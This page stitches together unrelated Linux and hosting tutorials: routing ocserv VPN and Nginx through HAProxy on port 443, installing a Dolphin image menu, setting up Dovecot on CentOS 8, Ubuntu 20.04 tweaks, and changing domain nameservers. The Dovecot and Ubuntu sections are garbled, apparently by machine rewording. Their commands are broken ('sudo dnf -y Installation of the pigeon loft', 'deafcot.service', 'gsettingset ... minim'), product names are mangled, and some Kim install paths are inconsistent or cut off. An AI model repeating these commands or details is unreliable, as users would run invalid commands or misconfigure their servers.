Normally a port can only be used by one process. However, we can use HAproxy (High Availability Proxy) and SNI (Server Name Indication) to make ocserv and Apache/Nginx use port 443 at the same time.

First, edit ocserv configuration file.

sudo nano /etc/ocserv/ocserv.conf

Uncomment the following line. This will allow ocserv to obtain the client IP address instead of HAproxy IP address.

listen-proxy-proto = true

Then find the following line.

#listen-host = [IP|HOSTNAME]

Change it to

listen-host = 127.0.0.1

This will make ocserv listen on 127.0.0.1 because later HAproxy will need to listen on the public IP address. Save and close the file. Then restart ocserv.

sudo systemctl restart ocserv

Next, we also need to make the web server listen on localhost only, instead of listening on public IP address. If you use Nginx, edit the server block file.

sudo nano /etc/nginx/conf.d/www.example.com.conf

In the SSL server block, find the following directive.

listen 443 ssl;

Change it to

listen 127.0.0.2:443 ssl;

This time we make it listen on 127.0.0.2:443 because 127.0.0.1:443 is already taken by ocserv. Save and close the file. Then restart Nginx.

sudo systemctl restart nginx

Now install HAproxy.

sudo apt install haproxy

Edit configuration file.

sudo nano /etc/haproxy/haproxy.cfg

Copy and paste the following lines to the end of the file. Replace 12.34.56.78 with the public IP address of your server. Replace vpn.example.com with the domain name used by ocserv and www.example.com with the domain name used by your web server.

frontend https
bind 12.34.56.78:443
mode tcp
tcp-request inspect-delay 5s
tcp-request content accept if { req_ssl_hello_type 1 }

use_backend ocserv if { req_ssl_sni -i vpn.example.com }
use_backend nginx if { req_ssl_sni -i www.example.com }
use_backend nginx if { req_ssl_sni -i example.com }

default_backend ocserv

backend ocserv
mode tcp
option ssl-hello-chk
server ocserv 127.0.0.1:443 send-proxy-v2

backend nginx
mode tcp
option ssl-hello-chk
server nginx 127.0.0.2:443 check

Save and close the file. Then restart HAproxy.

sudo systemctl restart haproxy

In the configuration above, we utilized the SNI (Server Name Indication) feature in TLS to differentiate VPN traffic and normal HTTPS traffic.

  • When vpn.example.com is in the TLS Client Hello, HAProxy redirect traffic to the ocserv backend.
  • When www.example.com is in the TLS Client Hello, HAProxy redirect traffic to the nginx backend.
  • If the client doesn’t specify the server name in TLS Client Hello, then HAproxy will use the default backend (ocserv).

You can test this setup with the openssl tool. First, run the following command multiple times.

echo | openssl s_client -connect your-server-IP:443 | grep subject

We didn’t specify server name in the above command, so HAproxy will always pass the request to the default backend (ocserv), and its certificate will be sent to the client. Next, run the following two commands.

echo | openssl s_client -servername www.example.com -connect your-server-IP:443 | grep subject

echo | openssl s_client -servername vpn.example.com -connect your-server-IP:443 | grep subject

Now we specified the server name in the commands, so HAproxy will pass request accordingly. Note that the Cisco AnyConnect App doesn’t support TLS SNI, so it’s better to set ocserv as the default backend in HAProxy configuration file.

When renewing Let’s Encrypt certificate for your website, it’s recommended that you use the http-01 challenge instead of tls-alpn-01 challenge, because HAproxy is listening on port 443 of the public IP address, so it can interfere with the renew process.

sudo certbot renew –preferred-challenges http-01

Fixing HAproxy Error

If your Nginx web server doesn’t show up in your browser and you see the following messages in haproxy log (/var/log/haproxy.log)

Server nginx/nginx is DOWN, reason: Socket error, info: “Connection reset by peer

backend nginx has no server available!

Layer6 invalid response

It maybe because your backend Nginx web server is using a TLS certificate with OCSP must staple extension. Nginx doesn’t send the OCSP staple information on the first HTTP request. To make it work, be sure to add a resolver in your Nginx virtual host configuration like below.

{
….
ssl_trusted_certificate /etc/letsencrypt/live/www.example/chain.pem;
ssl_stapling on;
ssl_stapling_verify on;

resolver 8.8.8.8;
….
}

Save and close the file. Then restart Nginx.

sudo systemctl restart nginx

Also consider removing health check for the backend server in HAproxy. So change

server nginx 127.0.0.2:443 check

To

server nginx 127.0.0.2:443

Save and close the file. Then restart HAproxy.

sudo systemctl restart haproxy

How to Disable TLS 1.0 and TLS 1.1 in ocserv

The PCI council deprecated TLS 1.0 in June 30, 2018 and main stream web browsers are going to disable TLS 1.0 and TLS 1.1 in 2020. We should do the same with VPN server. Edit the main configuration file.

sudo nano /etc/ocserv/ocserv.conf

Find the following line:

tls-priorities = “NORMAL:%SERVER_PRECEDENCE:%COMPAT:-RSA:-VERS-SSL3.0:-ARCFOUR-128”

To disable TLS 1.0 and TLS 1.1 in OpenConnect VPN server, just add -VERS-TLS1.0 and -VERS-TLS1.1 in the line.

tls-priorities = “NORMAL:%SERVER_PRECEDENCE:%COMPAT:-RSA:-VERS-SSL3.0:-ARCFOUR-128:-VERS-TLS1.0:-VERS-TLS1.1”

Save and close the file. Then restart ocserv.

sudo systemctl restart ocserv

Now ocserv will only accept TLS 1.2. For further information on configuring the TLS parameter in ocserv, please see GnuTLS priority strings.

To check if TLS 1.0 is supported in your OpenConnect VPN server, run the following command.

openssl s_client -connect vpn.your-domain.com:443 -tls1

And check TLS 1.1

openssl s_client -connect vpn.your-domain.com:443 -tls1_1

If you see the following message in the output, that means the TLS version is not supported.

New, (NONE), Cipher is (NONE)
Secure Renegotiation IS NOT supported

Note: The ocserv package on Ubuntu 20.04 supports TLS 1.3.

Per User or Per Group Configuration

Ocserv allows per user and per group configurations. To enable this feature, uncomment the following two lines in /etc/ocserv/ocserv.conf file.

config-per-user = /etc/ocserv/config-per-user/
config-per-group = /etc/ocserv/config-per-group/

Save and close the file. Then create the per user and per-group config directory.

sudo mkdir /etc/ocserv/config-per-user/
sudo mkdir /etc/ocserv/config-per-group/

Next, you can create a file under these two directories. For example, create the user1 file to allow custom configuration for user1.

sudo nano /etc/ocserv/config-per-user/user1

You can also create the group1 file to allow custom configuration for the group named group1.

sudo nano /etc/ocserv/config-per-group/group1

You can add something like below in the file.

route = 10.10.10.0/255.255.255.0
tunnel-all-dns = false
dns = 8.8.8.8
dns = 1.1.1.1

Where:

  • The first line means that after user1 or users in group1 connect to this VPN server, only traffic to the 10.10.10.0/24 network will be routed via VPN server. Traffic to other IP addresses are routed via the original gateway.
  • The second line disables tunneling DNS queries.
  • The third and fourth line set DNS servers for VPN clients.

I use this trick to allow my another VPS (virtual private server) to connect to this VPN server without disrupting normal traffic, so the TUN device (vpns0) of my VPN server is always turned on, which means my VPN server will always have the private IP address 10.10.10.1.

Save and close the file. Restart ocserv for the changes to take effect.

sudo systemctl restart ocserv

Wrapping Up

That’s it! I hope this tutorial helped you install and configure OpenConnect VPN on Ubuntu 20.04. As always, if you found this post useful, then subscribe to our free newsletter to get more tips and tricks

Rate this tutorial

[Total: 3 Average: 5]install openconnect ubuntu,ocserv certificate authentication

Read More

How to Edit, Rotate, Convert and Resize Images from Dolphin

We have seen that transforming images and re-scaling them should not be a complicated process. These are basic functions that should not require more than a right-click. We cannot complain that Windows or any other operating system does not provide built-in functionality. After all, how many people are actually interested in converting or reducing images? But we can tell you what you’ll probably do during your stay. Today we will see how to convert and resize Dolphin images with the right mouse button. Dolphin, for those who don’t know, is the default file manager on the KDE plasma desktop, pre-installed in Kubuntu.

In the past we have seen how you can reduce images with the right mouse button in Windows and even convert and reduce them in Ubuntu in the same way. In Ubuntu, as in many other Linux distributions and desktop environments, Nautilus is used as the default file manager. However, the plasma desk does not seem very user-friendly for Nautilus. So the Nautilus doesn’t go well with it. Plus, you don’t need the Nautilus if you already have the Dolphin. Dolphin is a much more functional file browser than the Nautilus, and we’ve already talked about it. If you want to know more about the Dolphin, you can visit this link –

How to install and use the Dolfinarium file manager under Ubuntu.

KDEImage menu

Dolphin is much more customizable than other file browsers, not just Nautilus. It also allows you to add or remove functions. The right-click context menu options are listed in Dolphin services and you can easily add them. KDE’s image menu is one of these services and is usually called Kim for short. Thanks to the integrated Dolphin Service Downloader, you can easily download and install a range of image tools that also work with a right-click of the mouse. They can only convert png to jpg or vice versa and are not as useful as Kim. With Kim you can not only resize images, but also compress them without resizing them. It not only transforms the images, but it also rotates them, transforms them into shades of grey or sepia. You can create gifts, retouch photos, create a Flash or HTML gallery and much more. Yes, right click and a few more clicks depending on the task.

How do you set up the KDEphoto menu?

Kim is unfortunately a bit outdated, and you can’t install it by simply pressing the Install button on the Dolphin service installer. Installing Kim is not so complicated if you can copy and paste text into the terminal from here. Before you can do this, you need to download the Kim archive package via the link below.

Right-click on the downloaded package and select Extract > Extract Archive. Next you have a file called kim4. Open this folder, in Dolphin of course, and press F4. If you press the F4 key, the terminal opens directly in Dolphin in the folder you are in. Do you see that? Delphin is a drug addict. You can also open a separate terminal window if you wish, but be sure to navigate to the kim4 folder on the terminal. Now copy and paste each of the following commands into the terminal one after the other and keep pressing the Enter key.

sudo cp src/kim_*.desktop /usr/share/kservices5/ServiceMenus/
sudo cp src/bin/kim_* /usr/bin/bin/
sudo chmod a+rx /usr/bin/kim_*
sudo chmod a+r /usr/share/kservices5/ServiceMenus/kim_*.desktop
sudo mkdir /usr/share/kim
sudo cp COPYING /usr/share/kim_kim_about.txt
sudo mkdir /usr/share/kim/slideshow/
sudo cp src/slideshow/* /usr/share/kim/slideshow/
sudo mkdir /usr/share/kim/gallery
sudo cp src/gallery/* /usr/share/kim/kim_kim_about.

Editing, rotating, transforming and resizing images by right-clicking the mouse using Kim in Dolphin

As soon as you execute the commands, restart the Dolphin. Go to the image in Dolphin, right click on it and move the mouse pointer over the actions. Here you must have three Kim entries – compression and resizing, conversion and rotation, manipulation and publication. If you don’t see Kim in the Actions section, log out of the current session and then log back in, or only restart the computer once. I recommend a full restart if nothing else works.

Read more: Make your KDE plasma desktop look like a MacOS

Read More

How do I install Dovecot on CentOS 8

Dovecot is an open source service for IMAP and POP3 on Unix-like operating systems. It focuses on a lean and secure email server that is available for most Linux operating systems. This manual will help you install and configure POS3/IMAP with Dovecot on your CentOS 8 operating system.

Step 1 – Placing a pigeon on CentOS 8

The Dovecot package is available in AppStream’s yum repository. Simply install the package on your CentOS 8 system using the yum/dnf package manager.

sudo dnf -y Installation of the pigeon loft

Step 2 – Insertion of the pigeon

Once the installation is complete, configure the Dovecot server according to your needs. Below you will find a quick and useful configuration of Dovecot to work with your system.

  • Edit the loft’s main configuration file and leave comments in the following lines to activate the POP3 and IMAP protocols. Configure also deafcot on all interfaces. sudo vi /etc/dovecot/dovecot.conf
    protocol = imap pop3 lmtp
    listen = *, : :
  • Then change the authentication file for Dovecot and update the following values: .sudo vi /etc/dovecot/conf.d/10-auth.conf
    disable_plaintext_auth = no
    auth_mechanisms = normal login
  • Then edit the mail configuration file to configure the location of your mailbox. Make sure the mail server settings have the correct location for emails.sudo vi /etc/dovecot/conf.d/10-mail.conf
    mail_location = maildir:~/Maildir
  • Then edit the following configuration file and specify the user and group name of the mail server on which .sudo vi /etc/dovecot/conf.d/10-master.conf
    unix_listener /var/spool/postfix/private/auth {
    mode = 0666
    user = postfix
    group = postfix
    }.
  • Finally, change the SSL configuration file of the loft. Set SSL to Yes or Mandatory. A self-separation certificate is used as standard. If you have your own certificates, update them as follows: sudo vi /etc/dovecot/conf.d/10-ssl.conf
    ssl= yes

ssl_cert = /letsencrypt/live/mail.tecadmin.net/cert.pem
ssl_key = /letsencrypt/live/mail.tecadmin.net/privkey.pem

Step 3 – Managing the pigeon service

We can control the loft with the systemctl command line tool. Use the following command to activate the Dovecot service.

sudo systemctl Start-up of the loft.service

Use the following commands to start/stop or restart the loft service:

sudo systemctl Start deafcot.service
sudo systemctl Stop deafcot.service
sudo systemctl Restart deafcot.service

To view the current status of the service, use the following command

sudo systemctl status deafcot.service

Step 4 – Test setup

The username rahul was created on my CentOS 8 system. We need the command line program mutt to connect the mailbox via the imaps protocol.

Scandal at court

Then use the following command to connect to your mailbox :

mormel -f imaps:// [Email Protection]

You will be asked to accept the certificate (press a to always accept it). You will then be asked to enter your password. Enter the user’s password and press the Enter key. You will see the e-mail address of your account.

Matt IMAPs connection

Step 5 – Setting up rules in the Firewall

To access your mail server from another computer, you must configure firewall rules to allow connections to the server at the required ports. The default ports are POP/IMAP :

  • IMAP – 143
  • IMAPS – 993
  • POP3 – 110
  • POP3S – 995

Execute the following commands to add firewall rules :

sudo firewall-cmd –add-service={pop3,imap} -permanent
sudo-Firewall-cmd –add-service={pop3s,imaps} -permanent

Then restart the changes.

sudo firewall-cmd – reboot

Conclusion

The Dovecot service is configured in your system. You have configured your server to access the user’s mailbox using the POP3 or IMAP protocols.install dovecot centos 7,configure dovecot postfix

Read More

10 Things You Should Not Do After Installing Ubuntu 20.04 LTS – And 4 Things You Should Not Do!

http://31.220.61.170/wp-content/uploads/2020/04/10-Things-To-Do-After-Installing-Ubuntu-20.04-LTS--.jpg-.jpg

Here is our selection of the best things you can do after installing Ubuntu 20.04 LTS ‘Focal Fossa’ – things that will help you get the most out of your Linux system.

The release of the latest version of Long Term Support (LTS) for Ubuntu is a real challenge as most Ubuntu users (who are constantly growing) have chosen to start the LTS edition compared to the last short edition.

Ubuntu is proud of the standard delivery. It comes with applications that most people will use and with settings that most people will like.

But you’re not everything, and there may be things you want to turn on and off or install – and that’s exactly what this guide covers.

Although some of the tips below may seem obvious, they are often forgotten or overlooked. Others are a sensory niche or specific needs. In any case, this set of parameters contributes to improving the Ubuntu experience without compromising its stability and reliability.

Cases to be resolved after installation of Ubuntu 20.04

1. Look what’s new.

Each version of Ubuntu is different from the previous one, and the last sentence is no exception. So, before you start changing settings or flipping switches, take a little time – say 3 minutes and 25 seconds – to find out what’s new and remarkable about Focal Fossa.

If you don’t see the embedded video above, you can find it on our YouTube channel.

2. Playing with Dark Mode

Ubuntu Dark Theme with Dark Shell Ubuntu 20.04 has option Dark Mode

Dark modes have been all the rage with all the major mobile and desktop operating systems these days, and I can imagine having one – and this offer now includes Ubuntu.

Although this is not the default theme, it is very easy to switch to dark window colours in Ubuntu 20.04 :

  • Settings > Open appearance
  • Select the setting for dark windows.

Let’s go, let’s go, let’s go, let’s go! The change takes effect immediately and immediately dims the background and toolbars of most applications. Note that dark mode in Ubuntu does not change the color of the GNOME Shell user interface, such as the notification menu, calendar, and system menu.

If you get tired of the dark display, you can return to the default mixed mode in the Appearance Settings window (or try the bright light version).

3. Installing Gnome Optimizations

http://31.220.61.170/wp-content/uploads/2020/04/10-Things-To-Do-After-Installing-Ubuntu-20.04-LTS--.jpeg-.jpeg

Gnome Tweaks is a Swiss army knife of options, including…

  • Change the GTK and the theme symbol
  • Move the window buttons to the left
  • Change the font and font size on your desktop
  • Automatic new window centre
  • Show the day of the week on the label of the watch
  • Switching between dynamic and static working range

And a little more!

In short, Ubuntu Tweaks makes fine-tuning your Ubuntu desktop much, much easier than wandering around in the dconf editor.

The best way to install it is to do it in one click:

Click here to install GNOME Tweaks on Ubuntu.

4. Get a powerful example tool forfiles

http://31.220.61.170/wp-content/uploads/2020/04/1588237721_435_10-Things-To-Do-After-Installing-Ubuntu-20.04-LTS--.jpg-.jpg

GNOME Sushi is a useful tool for viewing space panels on the GNOME Shell desktop.

Anyone who has ever tried MacOS immediately knows what I mean by ‘gap viewing’, a feature first introduced to the Apple operating system and very popular with users.

First select (click) the file in the Nautilus file manager and then click the space bar. This gives an almost instant overview of the file.

The layout of the preview varies depending on the file, but the most common file formats are supported. Use Sushi for instant image viewing, media playback, PDF and LibreOffice document scrolling, folder size information, and more. – All this without having to open a single application.

And if you find the folder you want to fully open, the sushi window (in most cases) allows you to do so.

Sushi is free and open source software. You can install it to Ubuntu from the Ubuntu software. Just search for sushi by name, or if you are reading this message from the Ubuntu system, click this button:

Click here to install GNOME Sushi on Ubuntu

5. Activate minimization by clicking

Minimize the click in the Ubuntu animation gift

If you want applications to be minimized when you click the Ubuntu Docking Station icon, you can enable this behavior manually.

And I mean by hand, because even though it’s one of the most popular Ubuntu tweets, there’s still no easy way to do it with the GUI – but don’t worry, the command line is close!

Open a new terminal window and type the following command to be clicked to enable minimization in Ubuntu

gsettingset org.gnome.shell.extensions.dash-to-dock click action ‘minim’.

The change is immediate.

Do you want to move Doc Ubuntu? Use Settings > Dock > Position

6. Display battery with a power factor of

Importance of the battery

Skip this step if you are not using your laptop (or if you are and don’t want your battery percentage to go away without entering the status menu).

The Ubuntu battery charge indicator allows you to briefly check the battery life without entering the status menu. But it’s a bit small and a bit vague (does 2 bars mean I still have 60% or 30%?).

You can easily have Ubuntu display the percentage of battery charge using the power panel of the GNOME Tweaks tool, which I recommend in step 3 :

  1. Open GNOME Preferences
  2. Select Supreme Organ.
  3. Set the battery percentage slider to ON.

If you do not want to follow the GUI route, you can use the following command to display the battery level as a percentage on the top panel:

gsettingset org.gnome.desktop.interface show-battery percentage where

Much better!

Tip: You can open the terminal window at any time by pressing Ctrl + Alt + t.

7. Touch PanelChange of Slide Direction

http://31.220.61.170/wp-content/uploads/2020/04/1588237722_857_10-Things-To-Do-After-Installing-Ubuntu-20.04-LTS--.jpg-.jpg

If you’ve ever used a touchpad or trackpad with Ubuntu and the way the scroll direction is set by default – called Natural Scroll – then you shouldn’t get stuck!

Simply change the direction of the touchpad in Ubuntu so that the content moves in the same direction as you move, for example by scrolling down the page:

  • Open parameters
  • Switch to mouse and touchpad
  • Slide the Natural Scroll switch to the on position.

That’s all you need to set a scroll direction that makes you feel more comfortable.

8. LivepatchAdjustment

http://31.220.61.170/wp-content/uploads/2020/04/1588237722_6_10-Things-To-Do-After-Installing-Ubuntu-20.04-LTS--.jpg-.jpg

Livepatch can install and apply kernel security updates without rebooting your computer.

This feature is (of course) more focused on servers and business systems with mission-critical workloads, but Ubuntu Livepatch also works well on desktops – but only on LTS versions!

If you hate restarting as much as I do, this job is definitely a good find. Simply launch the Livepatch link from the application table to view it.

9. Switching on automatic waste disposal

http://31.220.61.170/wp-content/uploads/2020/04/1588237722_801_10-Things-To-Do-After-Installing-Ubuntu-20.04-LTS--.jpg-.jpg

The privacy options in the customer settings include a convenient set of space saving features, including automatic cleaning of the bin(s) at regular intervals – ideal if you (like me) tend to forget to remove the bin(s) regularly.

This feature and the Automatic deletion of temporary files settings can help you save space on Ubuntu with a minimum of effort on your site.

Yeah, yeah, yeah, yeah, yeah, yeah, yeah, yeah: Ubuntu gives you reason to be lazy!

10. Try top of the line software

http://31.220.61.170/wp-content/uploads/2020/04/1588237723_230_10-Things-To-Do-After-Installing-Ubuntu-20.04-LTS--.jpg-.jpg

The world of software, free, paid and open source, is at your disposal at Ubuntu. But where to start?

Well, tons of open source favorites are available for installation on Ubuntu 20.04 LTS directly from the Ubuntu software application, among others :

  • Mixer
  • Chrome
  • GIMP
  • Crete
  • Kdenlive
  • OBS
  • VirtualBox
  • VLC

And you don’t limit yourself to what’s in the archives. Other popular (but not necessarily open source) programs are also available for Ubuntu, including well-known names such as

  • Disagreements
  • Google Chrome
  • Lighting works
  • Skype
  • Silence
  • Steam
  • Telegram
  • Traction waveform

And these are just superficial scratches.

You can follow this blog to get more software recommendations, news about updated and promising new applications, how and when we open them! For more information about the software, please refer to the best Electron applications in our manual.

… and 4 things you can’t do

http://31.220.61.170/wp-content/uploads/2020/04/1588237723_638_10-Things-To-Do-After-Installing-Ubuntu-20.04-LTS--.jpg-.jpg

So here are some things to do after the installation of Ubuntu 20.04 LTS. I hope you found some of them useful – but what shouldn’t you do after installing or upgrading Ubuntu 20.04?

Here are some…

Do not add millions of additional spas

PPAs are a convenient way to install new applications and updates for Ubuntu that are delivered outside the main repository.

However, it will take some time to get familiar with your system before you add some random PPAs (often recommended, yes, sites like mine).

And if you can’t live without, try using only software-specific APPs, i.e. don’t add APPs to sinks that contain a lot of different tools and software you don’t want!

And that’s twice as much as the sink in the kitchen.

Do not uninstall a default desktop.

As mentioned at the beginning of this note, Ubuntu comes with a number of default settings that are as attractive as possible.

But the perception of Ubuntu on the GNOME shield desktop is not for everyone.

And while it’s trivial to get a vanilla GNOME installation with the Ubuntu version, completely removing the default desktop from the distribution is not the right solution, which you don’t like.

You will get a cheaper and cleaner system if you first install the right distribution and desktop.

Do not execute random Internet commands

You should never execute scripts or random commands that you find online on your system.

My rule of thumb is this: If I don’t understand what a team is going to do, I won’t abide by it.

As always.

This amount is doubled for jobs that do more than one thing at a time or that download and run scripts (ALWAYS check the content of the scripts before running them. Always, always, always).

P.S. NEVER execute this command. You know what I mean. It’s just… …no.

Don’t forget to share Ubuntu with others

A good way to contribute to the improvement of Ubuntu is to talk about it, what it can do, how you find it useful, and so on.

You can do it online in your blog post or social media updates or in person at a convention or leisure group.

I’m not saying we should go to aunt Barbara in the Netherlands and ask her to install it, but don’t be afraid to articulate the advantages of a system like Ubuntu.

P.S. Maybe not to mention it on the first date… speak from experience.

That’s my point, but what’s yours? Share it below!

Read More

How to set the domain name servers

Setting Nameservers for Your Domain

A Bit About the Nameservers

Nameservers (older use “Name Servers”) are part of DNS (Domain Name Server) records. DNS consists of A records, Cname records, and Mail routing records, also called MX records. The nameservers deal with the web requests for your domain. They basically tell your web browser where to go to serve the information to your computer over the internet.

By default, when you type your domain into a browser you will probably see a parking page (arranged by your domain registrar). Meaning the registrar uses its own nameservers. You can updated the nameservers with the ones provided by your web host.

For now, we will cover registering and getting your domain set up to interact with your web hosting server space. This domain<->website “connection” is done through the nameservers. Every domain has to have nameservers records in order to be accessible on the internet.
The nameservers often come in pairs, and are endorsed by IP addresses. Look at this form sample for demonstration:

  • ns1.bluehost.com, 162.88.60.37
  • ns2.bluehost.com, 162.88.61.37

When changing the nameservers at your domain provider you will usually use only the first “name” part: ns1.bluehost.com and ns2.bluehost.com.

Changing nameservers can also be done through IP addresses. In this case you need to have access to a DNS management section.
When you sign up for a hosting plan, the web host usually sends you and email afterwards with the server’s IP. Once you have the IP address go to your domain name provider, and change the Host (A) Record within the DNS setting to reflect the new IP address. It will take an hour or two based upon what the TTL(Time-To-Live) is pre-set to.
I won’t be describing this option for the time being as it is not that frequent. It is used, for example, for GoDaddy web hosting when using a non-GoDaddy domain (meaning the domain not registered at GoDaddy).

Already know how to update the nameservers? Looking for the specific nameservers records used by popular web hosts? Well, some of them can only be found directly at your web hosting providers. Nevertheless, you might still find a few useful settings, just skip to the >> Nameservers of Well-Known Web Hosts << section below.

What Do I Need to Make Nameservers Work?

All you need is love😉. But besides that: the Domain Name and Web Hosting!
I assume that you know How to Register a Domain Name or that you already have one. No harm done if you are not familiar with that. Just read on.
To make your domain “work” with your website you obviously need a web hosting service. Don’t have one yet? Reading this “Choose Your Web Host” guide will help you to find it.
Most hosting companies will send you an email with relevant hosting information, including your name servers that you will need. Just check your email-box, it will be (most likely) a part of the common “Welcome-to-Your-Host” e-mail. If not, the web host support will certainly have that information ready for you.

Note, you don’t have to worry about setting up the nameservers if you got your domain directly at your web hosting provider. In that case the web host sets the domain nameservers for you. A few good web hosts where you can get a free domain name with your hosting package:

Disclosure: We only review products and services that we believe will add value to our readers. Some of the links in this post are “affiliate links” from which we may earn commissions. Note: there is no additional cost to you! You’ll find more details on our Disclosure page. Thank you for your support!

If you already have your domain and web hosting, skip to the >> Set Up Nameservers
Or go directly to Namecheap or GoDaddy ‘set up nameservers’ guides if you your domain is at respective registrars.

Obtain a Domain Name If You Don’t Have One

First off, the domain is going to have to be purchased from a registrar and have the nameservers set to your web hosting space of choice. Yes, the nameservers’ setup will be done at your domain registrar, not at web hosting provider (unless the domain is registered directly at the web host).
A domain registrar is a company or organization that provides domain registration services to businesses or individuals who want to have a specific domain name or web address.

Domain Registrar

Domain names also have what is called a TLD (Top level domain or domain extension). Most commonly used are .com, .net, .org, .edu, and .me. There are several others that are not so popular. The list goes on for special country code TLD’s as well, to list a few: .us, .ca, .co.uk, com.au, .fr, .de, .my or .in.
New domain extensions (called “donuts”) like .xyz, .dating, .media, .zone, .shop, .pizza or .boutique are going to cost a bit more than the common .net or .com domains.
You’ll get an idea by browsing the above registrars and searching for your new domain.

Questions About Domains and Nameservers

Three most common questions asked:

Q: Do I need to know the web hosting nameservers before registering my domain?
A: No, not needed. Normally, first you just register your domain. Then you sign up for your chosen web hosting service. The web host will provide you with the nameservers for your domain.
Q: Do domain registrars charge any additional fees for custom nameservers?
A: Nope. No additional fees should be charged. If you bump into a domain registrar that does that, run away. The domain registration fee covers the Nameservers as they are the core part of domain name operations.
Q: How often can I change or update the nameservers?
A: As often as you need to. Just be aware that for changes to become fully functional you have to wait up to 48 hours (usually they work within 24 hours).

Setting Up Nameservers

Once you have thought about the name of your domain and have paid for the domain you chose, you will then need to set the nameservers of this domain. Depending on where you buy your domain, the process of changing the nameservers can be different.

By now, you should have/know:

  • The Nameservers Information for your domain. Normally, hosting companies will send you an email with your server space details.
  • Domain Registrar Access (e-mail/password). Most registrars will have you fill in “Account Details” (including your username and password) so you can log in and manage your new domain.

Every hosting company has pre-set nameservers for their hosting packages.
If you have purchased a shared hosting platform together with your domain (you have probably got a free domain deal), then the domain nameservers should already be set up and you won’t have to worry about any settings.

Most of you have probably registered your domain with one of the popular domain companies. Now, you would like to “attach” your domain to your website. Ho do you do that? Just start pointing your domain to where your website is hosted!

All you need to do is change the nameservers and wait the appropriate propagation times. Sounds easy, right? Sometimes it’s not so straightforward. To get your nameservers changed, you will want to log into your registrar and navigate to the DNS or Nameserver section in your account.

To make it easier to understand, we will explain this setup process individually for each of these two most popular domain registrars:

I believe these two examples should be sufficient to demonstrate the nameservers set-up process. Changing nameservers at other domain registrars is quite similar. The procedure always goes through “Manage DNS” or “Custom Nameservers” sections where you can make your updates and set up new nameservers.
Int the ‘worst case scenario’😵, bear in mind that you can always get help from your domain service or web hosting providers.

Change Namecheap Nameservers

Let’s deal with the case when you need to change or modify nameservers at Namecheap domain registrar. Now, reminding again, this scenario only applies when you don’t have a web hosting service with Namechaep, only your registered domain.

  1. Go to namecheap.com. Log into your Namecheap account (enter your username, password):
Namecheap Login | Homepage

1. Sign-In | Namecheap Nameservers

  1. Right after signing-in you’ll see your “Dashboard”. Select the domain you want to change the nameservers for (click on the picture below to see it in lightbox).
Select Domain - Namecheap2. Dashboard | Namecheap Nameservers
  1. Scroll down a bit, locate the DNS Management Section with a drop-down menu. There will be 3 options to select from: “Namecheap BasicDNS”, “Namecheap Web Hosting DNS” and “Custom DNS”. Select the Custom DNS item. Refer to the screenshot below.
Custom Nameservers - Namecheap3. Custom Nameservers | Namecheap DNS

As you can see, in the “Custom DNS” settings we have our Siteground hosting nameservers. Of course, if we move to another web host, the nameservers will change. We are satisfied with Siteground, still, in the future, no-one knows, we might consider another hosting provider (as part of our ongoing “web hosting” journey 😉). The takeout: your website can be moved to any web hosting company, all you need is to update the nameservers accordingly!
Not to forget, the nameserver change is not going to happen “instantly”. The propagation time can vary depending on many network factors.

Change GoDaddy Nameservers

You are going to modify your GoDaddy’s domain nameservers to have them pointing to your web hosting provider. Granted, that your web hosting is not Godaddy.

  1. Go to godaddy.com. Sign into your GoDaddy domain account (Domain Control Center). Follow the screenshots bellow. I don’t think they are all necessary, but some beginners like to see it in layman’s perspective.
GoDaddy Sign-In1a. Sign-In | GoDaddy Domain
GoDaddy Sign-In Page

1b. Sign-In Box | GoDaddy Domain Account

  1. You will be brought to the “My Products” screen, that lists your domain names and other products you may have. Pick the domain you need to make the nameservers updates to. Click on the “Manage” button to proceed to the “Settings” page. Scroll down to “Additional Settings” block. Here you’ll find the “Manage DNS” link that will take yo to the the “DNS Management” panel. In the “DNS Management” panel, scroll down to the “Nameservers” section.
    If your domain uses Godaddy’s nameservers you will see various DNS entries in the Records panel. You don’t have to worry about them now.
    By default, your domain will have GoDady’s nameservers, something like ns71.domaincontrol.com and ns72.domaincontrol.com (or any ns’NumberNumber’.domaincontrol.com records).
GoDaddy Domain List2a. Domain List | GoDaddy Account
GoDaddy Additional Settings2b. Additional Settings Links | GoDaddy
GoDaddy DNS Management

2c. DNS Management | GoDaddy Nameservers

  1. Next to the “Using default nameservers” click on the “Change” button.
    You’ll get to the next screen “Connect My Domain to a Website”. Click on the link below “Enter my own nameservers (advanced)“.
    In the ‘Choose Your Nameservers’ form enter the custom nameservers of your web host or web service. If you need more lines/boxes use the ‘Ad Nameservers‘ button (down-right). Then save your changes!
    Right after the changes you will see a notification about the update being in process. Note, at this point you will still see the ‘Records’ panel with various default data. But after refreshing the page (or after a couple of minutes) the records will be unavailable: “We can’t display your DNS information because your nameservers aren’t managed by us“.
    Done and done! Now you have to wait for the new nameservers to be processed.
Set Nameservers GoDaddy

3a. Connect Your Domain to a Website | GoDaddy Nameservers

Set Nameservers GoDaddy

3b. Set Your Own Nameservers | GoDaddy

Nameservers Update Info GoDaddy

3c. Nameservers Notification After the Update | GoDaddy

Nameservers Change Processed GoDaddy

3d. Custom Nameservers Updated | GoDaddy

In our GoDaddy’s “Custom Nameservers” screenshot we use the Bluehost nameservers. Yes, we have another small website at Bluehost. We carry-out a wide range of tests to get a better picture of their services. So don’t forget to enter your web host nameservers in there!

Nameservers Propagation

After the nameserver change, a network background process occurs called propagation. Propagation of a DNS change like nameservers, generally takes around 24 hours for all web traffic to start seeing the content of your website (based on my experience, usually it is no more than 12 hours). In some cases it could take up to 48 hours. For any longer propagation time you need to contact the registrar and/or your web hosting company.
There are several good websites you can use to check if your domain is propagated to your new server or not. I bring this up because propagation seems to be where most of the confusion comes from. If you are like me when I started, I had no idea what DNS or nameservers even were.

Checking the Propagation Change

Dnschecker.org: DNSchecker allows you to put in your domain name and check different DNS records and if they have propagated to different areas around the world. What you are looking for is NS in the dropdown.

Viewdns.info: ViewDNS has several different tools available to use to check different things, but what you are looking for is the “DNS propagation checker tool” which you can search for domains to check propagation with.

Whatsmydns.net: WhatsmyDNS offers the same thing that DNSchecker.org offers. You get the ability to search a domain and different types of dns records. Again, what you are looking for is NS in the dropdown next to the search.

Site24x7.com: When you first land on this website, it can look intimidating. If you click “Tools” at the top, you can either wait for the banner to change to “DNS Analysis of your Domain” or click on “Check Website Availability” from the list of Server Administrator Tools.

DNS serverCommon server rack that could be part of a DNS server or web hosting space

Nameservers of Popular Web Hosts

Lost your web host’s welcome email with nameservers instructions? You should always try to get the most up-to-date nameservers information directly at your web host website or from their support.
